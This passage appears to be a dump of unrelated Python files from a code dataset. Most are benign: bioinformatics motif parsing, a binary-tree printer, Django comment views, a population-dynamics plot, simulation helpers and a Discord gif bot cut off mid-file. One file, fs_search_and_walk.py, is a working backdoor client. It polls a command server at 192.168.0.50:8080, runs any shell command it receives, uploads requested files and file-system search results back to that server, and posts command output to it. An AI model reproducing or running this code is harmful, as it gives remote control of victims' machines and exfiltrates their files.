p_vals[:length_cutoff]\n llr = llr[:length_cutoff]\n \n strand_translate = {True:'+', False:'-'}\n\n output_regions = pandas.DataFrame({'contig':[contig_names[contig_num] for contig_num in contig_ids],\n 'start': start_locations,\n 'end': start_locations + pwm.shape[1],\n 'strand': [strand_translate[strand] for strand in strands],\n 'motif_score': motif_scores,\n 'empirical_llr': llr,\n 'p_value': p_vals,\n 'q_value': q_vals,\n })[['contig', 'start','end', 'strand', 'motif_score', 'empirical_llr','p_value', 'q_value']]\n \n print('All done in {}'.format(datetime.datetime.now() - start_time))\n return output_regions\n\n \ndef emit_sequences(linear_probabilities, size=1, random_seed=None, alphabet=('A', 'C', 'G','T')):\n \"\"\"\n Given a matrix of probabilities for each nucleotide by position, returns\n a list of sequences (as lists of characters) randomly drawn from :param:`alphabet`\n using :param:`random_seed`\n \"\"\"\n numpy.random.seed(random_seed)\n return [[numpy.random.choice(alphabet, 
p=linear_probabilities[:,col_number]) for col_number in range(linear_probabilities.shape[1])] for i in range(size)]\n\n\ndef count_aligned_motifs(motif_sequence_list):\n \"\"\"\n Given a list of aligned sequences (as strings), return a DataFrame of counts for each observed\n character by position.\n \"\"\"\n motif_counts = collections.defaultdict(lambda: collections.defaultdict(lambda: 0))\n for motif_sequence in motif_sequence_list:\n for char_pos, char in enumerate(motif_sequence):\n motif_counts[char_pos][char] += 1\n return (pandas.DataFrame(motif_counts).sort_index(axis=0)).fillna(value=0)\n \n\nclass HomerMotifEnrichment():\n def __init__(self, homer_output_directory):\n \"\"\"\n Class that wraps the html output of HOMER's motif enrichment analyses.\n \"\"\"\n self.homer_output_directory = homer_output_directory\n print('Initializing data wrapper for HOMER motif enrichment analyses in {}'.format(homer_output_directory))\n \n self.known_motif_table = None\n self.denovo_motif_table = None\n \n known_motif_fname = os.path.join(self.homer_output_directory, 'knownResults.html')\n denovo_motif_fname = os.path.join(self.homer_output_directory, 'homerResults.html')\n \n if os.path.isfile(known_motif_fname):\n print('Found known motif enrichments. Loading ...')\n self.known_motif_table = self._known_motifs_to_df(self._parse_known_motifs(known_motif_fname))\n \n if os.path.isfile(denovo_motif_fname):\n print('Found de novo motif enrichments. Loading ...')\n self.denovo_motif_table = self._denovo_motifs_to_df(self._parse_denovo_motifs(denovo_motif_fname))\n self.denovo_pfms = self._load_denovo_pfms(os.path.join(self.homer_output_directory, 'homerResults'), range(self.denovo_motif_table.shape[0]))\n\n def _parse_known_motifs(self, known_motif_file_name):\n table_data = {}\n # known_motif_file_name = os.path.join(motif_dir, 'knownResults.html')\n\n with open(known_motif_file_name, 'rt') as html_file:\n known_motifs = bs4.BeautifulSoup(html_file.read(), 'html.parser')\n\n table_body = known_motifs.table\n table_rows = table_body.find_all('tr')\n header_row = table_rows[0]\n col_headers = [ele.contents[0].encode() for ele in header_row.find_all('td')]\n for rank, row in enumerate(table_rows[1:]):\n new_row_data = {}\n for field_name, field_value in zip(col_headers, row.find_all('td')):\n field_name = field_name.decode()\n if field_value.findChildren():\n if field_name == 'Motif':\n # new_row_data['Motif'] = field_value.findChildren()[0].attrs['src'] # used to store the filename of the PNG in older HOMER versions. 
Now obsolete.\n new_row_data['Motif'] = field_value # for now we just store the SVG markup until we figure out what to do with it.\n else:\n new_value = field_value.contents[0].strip()\n if field_name == 'Name':\n new_value = new_value.split('/')[0]\n new_row_data[field_name] = toolbox.smart_convert(new_value)\n\n table_data[rank] = new_row_data\n return table_data\n\n def _known_motifs_to_df(self, motif_data_dict):\n COL_ORDER = ['Name',\n 'P-value',\n 'q-value (Benjamini)',\n '% of Targets Sequences with Motif',\n '% of Background Sequences with Motif',\n '# Target Sequences with Motif',\n '# Background Sequences with Motif'\n ]\n motif_df = pandas.DataFrame(motif_data_dict).T\n motif_df = motif_df.loc[:, COL_ORDER]\n return motif_df\n\n def _parse_denovo_motifs(self, de_novo_motif_file_name):\n\n table_data = {}\n\n with open(de_novo_motif_file_name, 'rt') as html_file:\n known_motifs = bs4.BeautifulSoup(html_file.read(), 'html.parser')\n\n table_body = known_motifs.table\n table_rows = table_body.find_all('tr')\n header_row = table_rows[0]\n col_headers = [ele.contents[0].encode() for ele in header_row.find_all('td')]\n # print col_headers\n for rank, row in enumerate(table_rows[1:]):\n new_row_data = {}\n for field_name, field_value in zip(col_headers, row.find_all('td')):\n field_name = field_name.decode()\n if field_value.findChildren():\n if field_name == 'Motif':\n # new_row_data['Motif'] = field_value.findChildren()[0].attrs['src'] # used to store the filename of the PNG in older HOMER versions. Now obsolete.\n new_row_data['Motif'] = field_value # for now we just store the SVG markup until we figure out what to do with it.\n\n elif field_name == 'Best Match/Details':\n best_match_text = field_value.get_text()\n matching_motif_name = best_match_text.split('/')[0]\n similarity = float(best_match_text.split('/')[-1].split('(')[-1].split(')')[0])\n new_row_data['Best Match'] = matching_motif_name\n new_row_data['Similarity'] = similarity\n else: \n new_value = field_value.contents[0].strip() \n new_row_data[field_name] = toolbox.smart_convert(new_value)\n\n table_data[rank] = new_row_data\n\n return table_data\n\n def _denovo_motifs_to_df(self, motif_data_dict):\n COL_ORDER = ['Best Match',\n 'Similarity',\n 'P-value',\n '% of Targets',\n '% of Background',\n 'STD(Bg STD)'\n # 'Best Match/Details'\n ]\n motif_df = pandas.DataFrame(motif_data_dict).T\n motif_df = motif_df.loc[:, COL_ORDER]\n return motif_df\n \n def _load_denovo_pfms(self, motif_directory, motif_numbers):\n print('Loading PFMs for de novo motifs ...')\n pfm_dict = {}\n for motif_num in motif_numbers:\n motif_fname = os.path.join(motif_directory, 'motif{}.motif'.format(motif_num+1))\n \n pfm_dict[motif_num] = list(load_PFM_vertical(motif_fname, data_type='frequencies').values())[0]\n return pfm_dict\n \n \ndef parse_motif_name(motif_name):\n \"\"\"\n Given a motif data header from HOMER, return a tuple consisting of the trimmed motif name, the motif class, and the LLR threshold\n \"\"\"\n partial_name = motif_name.split('\\t')[1].split('/')[0]\n motif_class = partial_name.split('(')[1].split(')')[0]\n trimmed_name = partial_name.split('(')[0]\n threshold = float(motif_name.split('\\t')[2])\n return trimmed_name, motif_class, threshold ","sub_path":"pgtools/motiftools.py","file_name":"motiftools.py","file_ext":"py","file_size_in_byte":39566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483856418","text":"\n# Binary tree defintion\nimport random\nNODE_PRINT_SIZE 
= 6\n\nclass Node:\n    # A binary tree node holding a value and optional left/right children.\n    def __init__(self, val, left=None, right=None):\n        self.left = left\n        self.right = right\n        self.val = val\n\ndef createRandomBinaryTree(level):\n    # numberOfNode = pow(2,size) - 1\n    # print(numberOfNode)\n    tree = generateTree(level)\n    return tree\n\ndef printBinaryTree(node):\n    if node:\n        print(node.val)\n        printBinaryTree(node.left)\n        printBinaryTree(node.right)\n\ndef generateTree(level):\n    if level < 0:\n        return None\n    n = Node(random.randint(0, 99))\n    n.right = generateTree(level-1)\n    n.left = generateTree(level-1)\n    # print(n.val)\n    return n\n\ndef generateOffset(length):\n    text = \"\"\n    offsetLength = int(length * NODE_PRINT_SIZE)\n    for i in range(0, offsetLength):\n        text += \" \"\n    return text\n\ndef prettyPrintBT(node, offset):\n    if node:\n        prettyPrintBT(node.right, offset+1)\n        pNode = \"----[{0}]\".format(node.val)\n        print(generateOffset(offset)+pNode)\n        print(generateOffset(offset)+\"|\")\n        prettyPrintBT(node.left, offset+1)\n\n","sub_path":"python/src/binarytree/BT.py","file_name":"BT.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208792581","text":"import textwrap\nimport datetime\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.template.response import TemplateResponse\nfrom django.http import Http404, HttpResponse, HttpResponseNotAllowed\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.html import escape\nfrom django.utils import simplejson\n\nfrom django.contrib.comments.views.utils import next_redirect\nfrom django.contrib.comments.views.comments import CommentPostBadRequest\nfrom django.contrib.comments import signals, get_form, get_model\n\nfrom mptt_comments.decorators import login_required_ajax\n\ndef _lookup_content_object(data):\n    # Look up the object we're trying to comment about\n    ctype = data.get(\"content_type\")\n    object_pk = data.get(\"object_pk\")\n    parent_pk = data.get(\"parent_pk\")\n    \n    if parent_pk:\n        try:\n            parent_comment = get_model().objects.get(pk=parent_pk)\n            target = parent_comment.content_object\n            model = target.__class__\n        except get_model().DoesNotExist:\n            return CommentPostBadRequest(\n                \"Parent comment with PK %r does not exist.\" % \\\n                escape(parent_pk))\n    elif ctype and object_pk:\n        try:\n            parent_comment = None\n            model = models.get_model(*ctype.split(\".\", 1))\n            target = model._default_manager.get(pk=object_pk)\n        except TypeError:\n            return CommentPostBadRequest(\n                \"Invalid content_type value: %r\" % escape(ctype))\n        except AttributeError:\n            return CommentPostBadRequest(\n                \"The given content-type %r does not resolve to a valid model.\" % \\\n                escape(ctype))\n        except ObjectDoesNotExist:\n            return CommentPostBadRequest(\n                \"No object matching content-type %r and object PK %r exists.\" % \\\n                (escape(ctype), escape(object_pk)))\n    else:\n        return CommentPostBadRequest(\"Missing content_type or object_pk field.\")\n\n    return (target, parent_comment, model)\n\n@login_required_ajax\ndef new_comment(request, parent_pk=None, content_type=None, object_pk=None, *args, **kwargs):\n    \"\"\"\n    Display the form used to post a 
reply. \n \n Expects a comment_id, and an optionnal 'is_ajax' parameter in request.GET.\n \"\"\"\n \n is_ajax = request.GET.get('is_ajax') and '_ajax' or ''\n data = {\n 'parent_pk': parent_pk, \n 'content_type': content_type,\n 'object_pk': object_pk,\n }\n response = _lookup_content_object(data)\n if isinstance(response, HttpResponse):\n return response\n else:\n target, parent_comment, model = response\n \n # Construct the initial comment form\n form = get_form()(target, parent_comment=parent_comment)\n \n template_list = [\n \"comments/%s_%s_new_form%s.html\" % tuple(str(model._meta).split(\".\") + [is_ajax]),\n \"comments/%s_new_form%s.html\" % (model._meta.app_label, is_ajax),\n \"comments/new_form%s.html\" % is_ajax,\n ]\n return TemplateResponse(request, template_list, { \"form\" : form })\n\n@login_required_ajax\n@login_required\ndef post_comment(request, next=None, *args, **kwargs):\n \"\"\"\n Post a comment.\n\n HTTP POST is required unless a initial form is requested. If ``POST['submit'] == \"preview\"`` or if there are\n errors a preview template, ``comments/preview.html``, will be rendered.\n \"\"\"\n\n # Require POST\n if request.method != 'POST':\n return HttpResponseNotAllowed([\"POST\"])\n \n is_ajax = request.POST.get('is_ajax') and '_ajax' or ''\n\n # Fill out some initial data fields from an authenticated user, if present\n data = request.POST.copy()\n\n if request.user.is_authenticated():\n if not data.get('name', ''):\n data[\"name\"] = request.user.get_full_name()\n if not data.get('email', ''):\n data[\"email\"] = request.user.email\n\n response = _lookup_content_object(data)\n if isinstance(response, HttpResponse):\n return response\n else:\n target, parent_comment, model = response\n\n # Do we want to preview the comment?\n preview = data.get(\"submit\", \"\").lower() == \"preview\" or \\\n data.get(\"preview\", None) is not None\n \n # Construct the comment form \n form = get_form()(target, parent_comment=parent_comment, data=data)\n \n # Check security information\n if form.security_errors():\n return CommentPostBadRequest(\n \"The comment form failed security verification: %s\" % \\\n escape(str(form.security_errors())))\n\n # If there are errors or if we requested a preview show the comment\n if form.errors or preview:\n template_list = [\n \"comments/%s_%s_preview%s.html\" % tuple(str(model._meta).split(\".\") + [is_ajax]),\n \"comments/%s_preview%s.html\" % (model._meta.app_label, is_ajax),\n \"comments/preview%s.html\" % is_ajax\n ]\n data = {\n 'comment': form.data.get(\"comment\", \"\"),\n 'parent': parent_comment,\n 'level': parent_comment and parent_comment.level + 1 or 0,\n 'title': form.data.get(\"title\", \"\"),\n 'submit_date': datetime.datetime.now(),\n 'rght': 0,\n 'lft': 0,\n 'user': request.user,\n 'user_name' : request.user.username,\n }\n comment = get_model()(**data)\n return TemplateResponse(request, template_list, {\n \"comment\" : comment,\n \"preview\" : True,\n \"form\" : form,\n \"allow_post\": not form.errors,\n \"is_ajax\" : is_ajax,\n })\n\n # Otherwise create the comment\n comment = form.get_comment_object()\n comment.ip_address = request.META.get(\"REMOTE_ADDR\", None)\n comment.user = request.user\n comment.user_name = request.user.username\n\n # Signal that the comment is about to be saved\n responses = signals.comment_will_be_posted.send(\n sender = comment.__class__,\n comment = comment,\n request = request\n )\n\n for (receiver, response) in responses:\n if response == False:\n return CommentPostBadRequest(\n 
\"comment_will_be_posted receiver %r killed the comment\" % receiver.__name__)\n\n # Save the comment and signal that it was saved\n comment.save()\n signals.comment_was_posted.send(\n sender = comment.__class__,\n comment = comment,\n request = request\n )\n \n return next_redirect(request, next, 'comments-comment-done%s' % (is_ajax and '-ajax' or ''), c=comment._get_pk_val())\n \ndef confirmation_view(template, doc=\"Display a confirmation view.\", is_ajax=False, *args, **kwargs):\n \"\"\"\n Confirmation view generator for the \"comment was\n posted/flagged/deleted/approved\" views.\n \n The HTTP Status code will be different depending on the comment used:\n - 201 Created for a is_public=True comment\n - 202 Accepted for a is_public=False comment\n \"\"\"\n def confirmed(request):\n comment = None\n if 'c' in request.GET:\n try:\n comment = get_model().objects.get(pk=request.GET['c'])\n except ObjectDoesNotExist:\n pass\n\n response = TemplateResponse(request, template, {\n 'comment': comment,\n 'is_ajax': is_ajax,\n 'success' : True\n })\n response.status_code = comment.is_public and 201 or 202\n return response\n\n confirmed.__doc__ = textwrap.dedent(\"\"\"\\\n %s\n\n Templates: `%s``\n Context:\n comment\n The posted comment\n \"\"\" % (doc, template)\n )\n return confirmed\n \ncomment_done_ajax = confirmation_view(\n template = \"comments/posted_ajax.html\",\n doc = \"\"\"Display a \"comment was posted\" success page.\"\"\",\n is_ajax = True,\n)\n\ncomment_done = confirmation_view(\n template = \"comments/posted.html\",\n doc = \"\"\"Display a \"comment was posted\" success page.\"\"\"\n)\n \ndef comment_tree_json(request, object_list, tree_id, cutoff_level, bottom_level):\n \n if object_list:\n json_comments = {'end_level': object_list[-1].level, 'end_pk': object_list[-1].pk}\n \n template_list = [\n \"comments/display_comments_tree.html\",\n ]\n json_comments['html'] = render_to_string(\n template_list, {\n \"comments\" : object_list,\n \"cutoff_level\": cutoff_level,\n \"bottom_level\": bottom_level,\n \"is_ajax\" : True,\n }, \n RequestContext(request, {})\n )\n \n return json_comments\n return {}\n\ndef comments_more(request, from_comment_pk, restrict_to_tree=False, *args, **kwargs):\n\n comment = get_model().objects.select_related('content_type').get(pk=from_comment_pk)\n\n offset = getattr(settings, 'MPTT_COMMENTS_OFFSET', 20)\n collapse_above = getattr(settings, 'MPTT_COMMENTS_COLLAPSE_ABOVE', 2)\n cutoff_level = getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)\n bottom_level = 0\n \n qs = get_model().objects.filter_hidden_comments().filter(\n content_type=comment.content_type,\n object_pk=comment.object_pk,\n level__lte=cutoff_level\n )\n \n part1 = Q(tree_id=comment.tree_id) & Q(lft__gte=comment.lft + 1)\n if restrict_to_tree:\n # Here we only want the nodes with the same root-id and a greater lft value. \n qs = qs.filter(part1)\n bottom_level = comment.level + 1\n else:\n # Here we need all nodes with a different root-id, or all nodes with\n # the same root-id and a greater lft value. 
\n # The default order should do the right thing\n # \n # FIXME: it expects tree_id to be in chronological order!\n part2 = Q(tree_id__gt=comment.tree_id)\n qs = qs.filter(part1 | part2)\n \n until_toplevel = []\n remaining = []\n toplevel_reached = False\n remaining_count = qs.count() - offset\n \n for comment in qs[:offset]:\n \n if comment.level == 0:\n toplevel_reached = True\n \n if toplevel_reached:\n remaining.append(comment)\n else:\n until_toplevel.append(comment)\n \n json_data = {'remaining_count': remaining_count, 'comments_for_update': [], 'comments_tree': {} }\n if restrict_to_tree:\n json_data['tid'] = comment.get_root().id\n else:\n json_data['tid'] = 0\n \n for comment in until_toplevel: \n json_comment = {'level': comment.level, 'pk': comment.pk, 'parent' : comment.parent_id}\n template_list = [\n \"comments/display_comment.html\",\n ]\n json_comment['html'] = render_to_string(\n template_list, {\n \"comment\" : comment,\n \"cutoff_level\": cutoff_level,\n \"collapse_levels_above\": collapse_above,\n \"is_ajax\" : True,\n }, \n RequestContext(request, {})\n )\n json_data['comments_for_update'].append(json_comment)\n \n json_data['comments_tree'] = comment_tree_json(request, remaining, comment.tree_id, cutoff_level, bottom_level)\n \n return HttpResponse(simplejson.dumps(json_data), mimetype='application/json')\n \ndef comments_fulltree(request, tree_id, *args, **kwargs):\n try:\n comments = get_model().objects.filter_hidden_comments().filter(tree_id=tree_id)\n comment = comments[0]\n except IndexError:\n raise Http404(\"No top level comment found for tree id %s\" % tree_id)\n cutoff = getattr(settings, 'MPTT_COMMENTS_FULLTREE_CUTOFF', getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)) + 1\n return comments_subtree(request, comment.pk, include_self=True, include_ancestors=True, cutoff=cutoff, *args, **kwargs)\n \ndef comments_subtree(request, from_comment_pk, include_self=None, include_ancestors=None, cutoff=None, *args, **kwargs):\n \n comment = get_model().objects.select_related('content_type').get(pk=from_comment_pk)\n \n if not cutoff:\n cutoff = getattr(settings, 'MPTT_COMMENTS_CUTOFF', 3)\n cutoff_level = comment.level + cutoff\n bottom_level = not include_ancestors and (comment.level - (include_self and 1 or 0)) or 0\n \n qs = get_model().objects.filter_hidden_comments().filter(\n tree_id=comment.tree_id, \n lft__gte=comment.lft + (not include_self and 1 or 0),\n lft__lte=comment.rght,\n level__lte=cutoff_level - (include_self and 1 or 0)\n )\n \n is_ajax = request.GET.get('is_ajax') and '_ajax' or ''\n \n if is_ajax: \n \n json_data = {'comments_for_update': [], 'comments_tree': {} }\n json_data['comments_tree'] = comment_tree_json(request, list(qs), comment.tree_id, cutoff_level, bottom_level)\n \n return HttpResponse(simplejson.dumps(json_data), mimetype='application/json')\n \n else:\n \n target = comment.content_object\n model = target.__class__\n\n template_list = [\n \"comments/%s_%s_subtree.html\" % tuple(str(model._meta).split(\".\")),\n \"comments/%s_subtree.html\" % model._meta.app_label,\n \"comments/subtree.html\"\n ]\n \n comments = list(qs)\n if include_ancestors:\n comments = list(comment.get_ancestors()) + comments\n \n return TemplateResponse(request, template_list, {\n \"object\" : target,\n \"detail_comment\" : comment,\n \"comments\" : comments,\n \"bottom_level\": bottom_level,\n \"cutoff_level\": cutoff_level - 1,\n \"collapse_levels_above\": getattr(settings, 'MPTT_COMMENTS_COLLAPSE_ABOVE', 2),\n \"collapse_levels_below\": getattr(settings, 
'MPTT_COMMENTS_COLLAPSE_BELOW_DETAIL', True) and comment.level or 0\n })\n\ndef count_for_object(request, content_type_id, object_pk, mimetype='text/plain'):\n \"\"\"\n Returns the comment count for any object defined by content_type_id and object_id or slug.\n Mimetype defaults to plain text.\n \"\"\"\n try:\n ctype = ContentType.objects.get_for_id(content_type_id)\n except ObjectDoesNotExist:\n raise Http404(\"No content found for id %s\" % content_type_id)\n count = str(get_model().objects.filter(object_pk=object_pk, content_type=ctype).count())\n return HttpResponse(count, mimetype = mimetype)\n","sub_path":"mptt_comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111214656","text":"#!/usr/bin/env python3\nfrom plotly import tools as toolsly\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\nimport numpy as np\n\n##### parameters for everything\n\nalpha = 10 # prey growth\nbeta = 1 # predator eat\ndelta = 10. # predator growth\ngamma = 1 # predator death\n\n# second fixed point\n(xfixed, yfixed) = (gamma /delta, alpha / beta)\n\n# plotting parameters\nxmax = 2. * xfixed\nymax = 2. * yfixed\nnumarrows = 20.\n\n# grid for everything\nx,y = np.meshgrid(np.arange(0, xmax, xmax/numarrows), np.arange(0, ymax, ymax/numarrows))\n\n# vector of arrows\nu = alpha * x - beta * x * y\nv = delta * x * y - gamma * y\n\n####################\n\ntitle = 'alpha=%.1f beta=%.1f delta=%.1f gamma=%.1f' % (alpha, beta, delta, gamma)\next = '_'.join([str(item) for item in [alpha, beta, delta, gamma]])\nfilename='quiverplot_'+ext+'.html'\n\nhtmlline = ''.join([str(item) for item in [alpha, beta, delta, gamma]])\nhtmlline = '' + htmlline + 'link'\nprint(htmlline)\n\n# fixed points\npoints = go.Scatter(x=[0, xfixed], y=[0, yfixed],\n mode='markers',\n marker=dict(size=12),\n name='fixed points',)\n\noptions = {}\nif len(ext) <= 0:\n options['visible'] = 'legendonly'\n\n\nfig = toolsly.FigureFactory.create_quiver(x, y, u, v,\n scale=.01, arrow_scale=.1,\n name='density', **options)\n\nfig['data'].append(points)\nfig['layout']['xaxis'] = dict(range=[0., xmax])\nfig['layout']['yaxis'] = dict(range=[0., ymax])\nfig['layout']['title'] = title\nplot(fig, show_link=False, filename='lotka_volterra/'+ filename)\n\n# http://tributary.io/inlet/5211034\n","sub_path":"docs/lotka_volterra/quiver.py","file_name":"quiver.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297270339","text":"import sys\r\n\r\narglist = sys.argv\r\n\r\nfile1 = arglist[1]\r\nfile2 = arglist[2]\r\noutput = arglist[3]\r\n\r\n\r\n# Write list to file, every item on a new line\r\ndef writefile(file, input):\r\n\toutfile = open(file, \"w\")\r\n\tprint >> outfile, \"\\n\".join(str(i) for i in input)\r\n\toutfile.close()\r\n\r\n# Reads list from file\r\ndef readfile(file):\r\n\ttemp = open(file).readlines()\r\n\toutput = [int(float(i.strip())) for i in temp]\r\n\treturn output\r\n\r\n# Merge file1 and file2 to outputfile\r\ndef merge(file1, file2, outputfile):\r\n\ttemp1 = readfile(file1)\r\n\ttemp2 = readfile(file2)\r\n\tthelist = temp1 + temp2\r\n\t#stripped = [i.strip() for i in thelist]\r\n\tallint = [int(float(i)) for i in thelist]\r\n\twritefile(outputfile, allint)\r\n\r\nmerge(file1, file2, 
output)\r\n","sub_path":"plot/mergefile.py","file_name":"mergefile.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44288553","text":"\nfrom _selection_base import Selection_Base\n\nfrom .. import LastAnalysis\n\nimport ROOT\nimport json\nimport analysis\nimport scipy.spatial\nfrom analysis.beam_sampling import multivariate_gaussian\nimport numpy\nimport array\nimport os\n\n\nclass VoronoiPhaseSpaceSelection(Selection_Base) :\n\n def __init__(self) :\n Selection_Base.__init__(self, \"voronoi_phasespace_selection\")\n\n self.__data_file_number = 0\n self.__voronoi_data_file = LastAnalysis.LastData['analysis']['Voronoi_Tessellation']['voronoi_data']\n\n self.__event_counter = 0\n self.__current_file_events = 0\n\n self.advance_voronoi_data_file()\n\n\n\n def get_normalisation(self) :\n return self.__normalisation\n\n\n def weigh_event(self, event) :\n if self.__event_counter >= self.__current_file_events :\n self.advance_voronoi_data_file()\n\n weight = self.__weights[self.__event_counter]\n self.__event_counter += 1\n\n if weight < 1.0e-3 : \n return 0.0\n else :\n return weight\n\n\n def _get_plots(self, plot_dict) :\n pass\n\n\n def _get_data(self, data_dict) :\n pass\n\n\n def advance_voronoi_data_file(self) :\n voronoi_data = None\n filename = self.__voronoi_data_file+\".{0:05d}\".format(self.__data_file_number)\n if not os.path.exists(filename) :\n raise StopIteration\n else :\n with open(filename, 'r') as infile :\n voronoi_data = json.load(infile)\n\n self.__weights = voronoi_data['weights']\n # self.__densities = voronoi_data['densities']\n # self.__vertices = voronoi_data['vertices']\n # self.__regions = voronoi_data['regions']\n # self.__point_regions = voronoi_data['point_regions']\n self.__normalisation = voronoi_data['normalisation']\n \n self.__current_file_events = len(self.__weights)\n self.__data_file_number += 1\n self.__event_counter = 0\n\n\n","sub_path":"lib/mickey/selection_modules/voronoi_selection.py","file_name":"voronoi_selection.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180610378","text":"import os.path\nimport sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom simulator.simulation_obj import SimulationObject\n\n\"\"\" Simple test script to. Tests functionality of the simulation_obj class\"\"\"\n\n\n# instantiate simulation obj with default values\nsim_obj = SimulationObject(model_name='nearly.fmu', final_time=24.0, path_to_fmu='nearly.fmu')\nsim_obj.model_init() # initialize fmu model. 
Calls pyFMI model.init() and sets start and finish time\n# new dictionary with inputs for fmu time step\n\ni = 0\nshade = 1.0\n\nwhile i < 86400:\n input_dict = {'time_step': i, 'yShadeFMU': shade}\n output = sim_obj.do_time_step(input_dict)\n print(output)\n i += 600\n\nprint(\"FINISHED\")\n","sub_path":"src/simapi_simulation/fmu_simulator/simulator/test_simulation_obj.py","file_name":"test_simulation_obj.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239178995","text":"#!/usr/bin/env python\r\n# Filename: fs_search_and_walk.py\r\n# This program is optimized for Python 3.4\r\n# Description: Searches the file system for specific files and content\r\n# counterpart: None\r\n\r\n\r\nimport requests\r\nimport os\r\nimport subprocess\r\nimport time\r\n\r\nwhile True:\r\n req = requests.get('http://192.168.0.50:8080')\r\n command = req.text\r\n if 'terminate' in command:\r\n break\r\n elif 'grab' in command:\r\n grab, path = command.split(\"*\")\r\n if os.path.exists(path):\r\n url = \"http://192.168.0.50:8080/store\"\r\n filer = {'file': open(path, 'rb')}\r\n r = requests.post(url, files=filer)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.50:8080', data='[-] Not able to find the file!'.encode())\r\n elif 'search' in command: #The Formula is search *. -->for example let's say that we got search C:\\\\*.pdf\r\n command = command[7:] #cut off the the first 7 character ,, output would be C:\\\\*.pdf\r\n path, ext = command.split('*')\r\n lists = '' \r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n lists = lists + '\\n' + os.path.join(dirpath, file)\r\n requests.post(url='http://192.168.0.50:8080', data=lists)\r\n else:\r\n CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n post_response = requests.post(url='http://192.168.0.50:8080', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.50:8080', data=CMD.stderr.read())\r\n time.sleep(3)\r\n\r\n","sub_path":"fs_search_and_walk.py","file_name":"fs_search_and_walk.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"70368310","text":"import json\nimport math\nimport os\nimport random\nfrom copy import copy\n\nfrom discord.ext import commands\nfrom natsort import natsort\nfrom tabulate import tabulate\nfrom tinydb import Query\n\nfrom zurok import Checks\n\ngif_list_file = os.getcwd() + \"/gifs.json\"\n\n\nclass Gifs:\n def __init__(self, bot):\n self.bot = bot\n\n self.gif_table = self.bot.db.table(\"gifs\")\n self.gif_template = {\"name\": \"\", \"hidden\": False, \"url\": \"\"}\n\n if self.bot.cfg[\"devbuild\"] and len(self.gif_table.all()) <= 0:\n with open(gif_list_file, \"r\") as f:\n self.gif_table.insert_multiple(json.load(f))\n\n @commands.group(aliases=[\"gifs\"])\n async def gif(self, ctx, name: str=None):\n \"\"\"Show a gif or a random gif\"\"\"\n if name is None:\n r_gif = random.choice(self.gif_table.all())\n if r_gif[\"hidden\"]:\n await ctx.send(\"You've found a hidden gif! 
`{}`\\n{}\".format(r_gif[\"name\"], r_gif[\"url\"]))\n else:\n await ctx.send(\"`{}`\\n{}\".format(r_gif[\"name\"], r_gif[\"url\"]))\n else:\n if self.gif_table.contains(Query().name == name):\n await ctx.send(self.gif_table.get(Query().name == name)[\"url\"])\n else:\n await ctx.send(\"No gif found with that name.\\nTry {prefix}giffer search\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n\n @commands.group()\n async def giffer(self, ctx):\n \"\"\"Commands to manage gifs (add, remove, list)\"\"\"\n if ctx.invoked_subcommand is None:\n await ctx.send(\"Invalid sub-command!\\n Use `{prefix}help giffer` to view sub-commands\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n\n @giffer.command()\n async def add(self, ctx, name: str, url: str, hidden=False):\n \"\"\"Add a gif\"\"\"\n if not url.startswith(\"http://\") and not url.startswith(\"https://\"):\n await ctx.send(\"`{}` is not a valid url!\\n`{}`giffer add \".format(url, self.bot.cfg[\"prefix\"]))\n return\n\n if self.gif_table.contains(Query().name == name):\n await ctx.send(\"Gif exists with that name\")\n else:\n if name.startswith(\"-\"):\n await ctx.send(\"Gif name cannot start with `-`\")\n else:\n self.gif_table.insert({\"name\": name, \"hidden\": hidden, \"url\": url})\n await ctx.send(\"Added gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def remove(self, ctx, name: str):\n \"\"\"Remove a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n self.gif_table.remove(Query().name == name)\n await ctx.send(\"Removed gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def hide(self, ctx, name: str):\n \"\"\"Hide a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = self.gif_table.get(Query().name == name)\n _gif[\"hidden\"] = True\n self.gif_table.update(_gif, Query().name == name)\n await ctx.send(\"Hid gif: \" + name)\n\n @giffer.command()\n @Checks.restricted_cmd()\n async def unhide(self, ctx, name: str):\n \"\"\"Unhide a gif\"\"\"\n if not self.gif_table.contains(Query().name == name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = 